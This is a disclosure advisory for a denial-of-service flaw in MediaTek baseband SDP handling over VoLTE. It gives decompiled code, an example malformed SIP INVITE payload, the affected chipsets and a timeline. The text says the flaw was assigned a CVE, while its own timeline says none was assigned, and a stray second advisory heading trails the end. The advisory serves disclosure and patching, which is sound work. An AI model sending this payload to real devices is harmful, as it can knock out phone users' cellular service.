An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is DoS in the baseband, triggered by malformed VoLTE message such as SIP INVITE or MESSAGE request.

The vulnerability described in this advisory affected a wide range of Mediatek devices. This vulnerability is assigned CVE-2025-20725.

Vulnerability Details

Crash happens due to a NULL access.

void sdp_msg_create_negotiation_sdp(...) {
  sdp_cpy = sdp_msg_struct_copy(sdp_msg); // [1]
  if (sdp_cpy == (sdp_message_struct *)0x0) {
    ...
    return;
  }
  media = sdp_cpy->m;
  if (media != (sdp_media_struct *)0x0) {
    media_orig_p = sdp_msg->m; // original media
    while (media_orig_p != (sdp_media_struct *)0x0) { // [2]
      tcap_p = &media->tcap;
      if ((operator_id != 0xec) || (iVar4 = strcmp(media_orig_p->transport,"RTP/AVP"), iVar4 != 0)) {
        sdp_msg_remove_attribute((short *)media->other_attributes,"acfg",(char *)0x0,0,0); // [4]
        ...
      }
      ...
      media = media->next;
      media_orig_p = media_o_p->next; // [3]
    }
  }
  ...

sdp_msg_pack_media
  for(; media != (sdp_media_struct *)0x0; media=media->next) { // [1]
    if ((media->is_present == KAL_FALSE)) {
      continue;
    }
    if (media->transport[0] == '\0') { // [4]
      continue;
    }
  }

The function starts with copying the SDP structure (at [1], sdp_msg_struct_copy basically packs and unpacks the SDP message). The target will be returned, but it’s modified in-place.

At [2] it can be seen that the loop is until the original structure ends. However, no check is in place for the copied structure inside the loop (there is a check before the loop). This is a problem, because at [3] they are iterated in sync, but if a media element is missing from the copy, the original structure ends, and a null pointer is dereferenced at [4].

Example payload

Change any valid INVITE-flow message SDP contents to contain the following:

m=application 0  0

e.g.:

INVITE sip:192.168.101.2:50033;transport=tcp SIP/2.0
From: <sip:[email protected]>;tag=ttecbsI
To: "0010187049"<tel:0010187049;phone-context=ims.mnc001.mcc001.3gppnetwork.org>
CSeq: 1 INVITE
Content-Type: application/sdp
Content-Length: 784

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=application 0  0
m=application 0 RTP/AVP 0

Affected Devices

Includes most, possibly all, of the following devices:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

2025.06.23. Bug reported to Mediatek PSIRT
2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
2025.10.01. Advisory release

MSV-4628: Mediatek Baseband NULL Dereference in sdp_msg_pack_media Leading to Denial of Service

Vulnerability Details

Example payload

Affected Devices

Timeline